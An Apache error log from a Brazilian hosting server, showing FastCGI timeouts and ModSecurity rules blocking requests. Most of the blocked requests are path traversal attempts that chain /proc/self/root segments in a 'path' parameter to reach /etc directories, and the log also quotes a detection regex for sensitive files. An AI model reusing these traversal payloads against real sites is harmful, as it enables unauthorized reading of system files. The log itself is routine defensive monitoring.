[Tue Mar 17 18:16:24.125068 2026] [proxy_fcgi:error] [pid 19507:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:46364] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 18:16:46.091971 2026] [proxy_fcgi:error] [pid 25836:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:46654] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 18:16:57.719669 2026] [:error] [pid 31803:tid 140411557287680] [client 74.7.241.31:45302] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnEyeyqAr6etmhZHNo_kAAAAFY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 18:17:08.128627 2026] [proxy_fcgi:error] [pid 29151:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:47010] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 18:17:30.125796 2026] [proxy_fcgi:error] [pid 19507:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:47248] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 18:17:40.151703 2026] [:error] [pid 7437:tid 140411683178240] [client 74.7.243.128:59198] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/ld.so.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnE9AeiSKl8TjouI-YvdgAAA8c"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 18:17:52.125794 2026] [proxy_fcgi:error] [pid 19507:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:47518] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 18:18:15.119497 2026] [proxy_fcgi:error] [pid 31803:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:47878] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 18:18:37.129822 2026] [proxy_fcgi:error] [pid 7004:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:48294] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 18:18:59.138285 2026] [proxy_fcgi:error] [pid 29151:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:48600] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 18:19:21.125880 2026] [proxy_fcgi:error] [pid 7004:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:48966] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 18:19:28.353326 2026] [:error] [pid 2473:tid 140411658000128] [client 74.7.243.128:46962] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/modules-load.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnFYKBJNF7axNlVR0UwfgAAAAo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 18:19:43.049832 2026] [proxy_fcgi:error] [pid 29151:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:49256] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 18:19:46.344351 2026] [:error] [pid 2598:tid 140411540502272] [client 74.7.243.128:59078] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/selinux"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnFchj0p0SRWAqcjGGSPQAAAxg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 18:19:50.814074 2026] [:error] [pid 2473:tid 140411624429312] [client 74.7.243.128:58696] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/cron.hourly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnFdqBJNF7axNlVR0UwiAAAAA4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 18:19:52.987937 2026] [:error] [pid 31803:tid 140411699963648] [client 74.7.243.128:41148] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/cron.monthly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnFeOyqAr6etmhZHNo_-QAAAEU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 18:20:05.121805 2026] [proxy_fcgi:error] [pid 6296:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:49636] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 18:20:13.696747 2026] [:error] [pid 6296:tid 140411658000128] [client 74.7.241.31:33252] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnFjXIk7brgkOH-rIWk1QAAAUo"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 18:20:26.131293 2026] [proxy_fcgi:error] [pid 2598:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:50050] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 18:20:27.734137 2026] [:error] [pid 29151:tid 140411624429312] [client 74.7.228.61:56268] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abnFm_PqhzTj3BvfDX-fnAAAAc4"]
[Tue Mar 17 18:20:28.496525 2026] [:error] [pid 29151:tid 140411557287680] [client 74.7.244.43:38204] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abnFnPPqhzTj3BvfDX-fnQAAAdY"]
[Tue Mar 17 18:20:47.121826 2026] [proxy_fcgi:error] [pid 31803:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:50372] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 18:21:10.123670 2026] [proxy_fcgi:error] [pid 7004:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:50872] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 18:21:11.252089 2026] [:error] [pid 6296:tid 140411725141760] [client 74.7.241.31:33252] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/lldpd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnFx3Ik7brgkOH-rIWlBQAAAUI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 18:21:14.424215 2026] [:error] [pid 2598:tid 140411557287680] [client 74.7.241.31:57116] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/cron.daily"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnFyhj0p0SRWAqcjGGSagAAAxY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 18:21:16.087287 2026] [:error] [pid 31803:tid 140411674785536] [client 74.7.241.31:57124] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/locaweb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnFzOyqAr6etmhZHNpAGwAAAEg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 18:21:21.427469 2026] [:error] [pid 25836:tid 140411540502272] [client 74.7.243.128:41150] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/dnsmasq.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnF0Yh-PF_25v4hFRCC0wAAARg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 18:21:33.581791 2026] [proxy_fcgi:error] [pid 31803:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:51440] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 18:21:56.133812 2026] [proxy_fcgi:error] [pid 19507:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:52136] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 18:22:19.125830 2026] [proxy_fcgi:error] [pid 19507:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:52720] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 18:22:20.279753 2026] [:error] [pid 6296:tid 140411674785536] [client 74.7.243.128:35504] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/cron.daily"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnGDHIk7brgkOH-rIWlLwAAAUg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 18:22:24.642659 2026] [:error] [pid 2473:tid 140411666392832] [client 74.7.241.31:46896] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/modprobe.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnGEKBJNF7axNlVR0Uw1wAAAAk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 18:22:41.129963 2026] [proxy_fcgi:error] [pid 2598:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:53322] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 18:22:46.295082 2026] [:error] [pid 7437:tid 140411649607424] [client 74.7.243.128:40726] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/xinetd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnGJgeiSKl8TjouI-YwFwAAA8s"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 18:23:03.132285 2026] [proxy_fcgi:error] [pid 31803:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:53906] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 18:23:25.141854 2026] [proxy_fcgi:error] [pid 19507:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:54520] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 18:23:30.840245 2026] [:error] [pid 19507:tid 140411590858496] [client 74.7.243.128:53348] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/uwsgi.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnGUtY0UrI5A3LftIwWYAAAAZI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 18:23:46.117944 2026] [proxy_fcgi:error] [pid 31803:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:54994] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 18:24:08.128116 2026] [proxy_fcgi:error] [pid 29151:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:55362] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 18:24:30.117809 2026] [proxy_fcgi:error] [pid 6296:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:55706] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 18:24:44.232215 2026] [:error] [pid 6296:tid 140411716749056] [client 74.7.241.31:52776] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/openldap"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnGnHIk7brgkOH-rIWlmwAAAUM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 18:24:52.058587 2026] [proxy_fcgi:error] [pid 7437:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:56074] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 18:25:14.133785 2026] [proxy_fcgi:error] [pid 6296:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:56536] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 18:25:27.810887 2026] [:error] [pid 6296:tid 140411658000128] [client 74.7.228.61:36646] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abnGx3Ik7brgkOH-rIWlrwAAAUo"]
[Tue Mar 17 18:25:28.534506 2026] [:error] [pid 2473:tid 140411699963648] [client 74.7.244.43:37926] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abnGyKBJNF7axNlVR0UxJAAAAAU"]
[Tue Mar 17 18:25:37.074112 2026] [proxy_fcgi:error] [pid 26799:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:56946] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 18:25:59.126141 2026] [proxy_fcgi:error] [pid 26799:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:57368] AH01075: Error dispatching request to : (polling)
